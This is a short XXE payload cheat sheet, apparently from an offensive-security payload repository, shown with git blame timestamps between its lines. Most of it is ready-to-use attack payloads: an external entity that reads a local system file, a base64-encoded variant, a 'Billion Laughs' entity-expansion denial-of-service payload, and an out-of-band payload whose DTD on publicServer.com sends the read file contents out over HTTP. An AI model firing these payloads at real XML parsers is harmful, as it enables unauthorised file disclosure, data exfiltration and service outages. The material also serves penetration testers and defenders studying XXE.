2016-10-18 07:06:10 +00:00
|
|
|
# XML External Entity
|
|
|
|
An XML External Entity attack is a type of attack against an application that parses XML input
|
2016-10-18 08:01:56 +00:00
|
|
|
|
2016-10-18 07:06:10 +00:00
|
|
|
## Exploit
|
2016-10-18 08:01:56 +00:00
|
|
|
|
2016-10-18 07:06:10 +00:00
|
|
|
Classic XXE
|
2016-10-18 08:01:56 +00:00
|
|
|
```
|
2016-10-18 07:06:10 +00:00
|
|
|
<?xml version="1.0"?>
|
|
|
|
<!DOCTYPE data [
|
|
|
|
<!ELEMENT data (#ANY)>
|
|
|
|
<!ENTITY file SYSTEM "file:///sys/power/image_size">
|
|
|
|
]>
|
|
|
|
<data>&file;</data>
|
2016-10-18 08:01:56 +00:00
|
|
|
```
|
|
|
|
|
2016-10-18 07:06:10 +00:00
|
|
|
Classic XXE Base64 encoded
|
|
|
|
```
|
|
|
|
<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,PCFF...Cg=="> %init; ]><foo/>
|
|
|
|
```
|
|
|
|
|
|
|
|
Deny Of Service - Billion Laugh Attack
|
|
|
|
```
|
|
|
|
<!DOCTYPE data [
|
|
|
|
<!ENTITY a0 "dos" >
|
|
|
|
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
|
|
|
|
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
|
|
|
|
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
|
|
|
|
<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
|
|
|
|
]>
|
|
|
|
<data>&a4;</data>
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
|
|
XXE OOB Attack (Yunusov, 2013)
|
|
|
|
```
|
|
|
|
<?xml version="1.0" encoding="utf-8"?>
|
|
|
|
<!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_oob.dtd">
|
|
|
|
<data>&send;</data>
|
|
|
|
|
|
|
|
File stored on http://publicServer.com/parameterEntity_oob.dtd
|
|
|
|
<!ENTITY % file SYSTEM "file:///sys/power/image_size">
|
|
|
|
<!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'>">
|
|
|
|
%all;
|
|
|
|
```
|
|
|
|
|
|
|
|
|
2016-10-18 08:01:56 +00:00
|
|
|
## Thanks to
|
2016-10-18 07:06:10 +00:00
|
|
|
* https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
|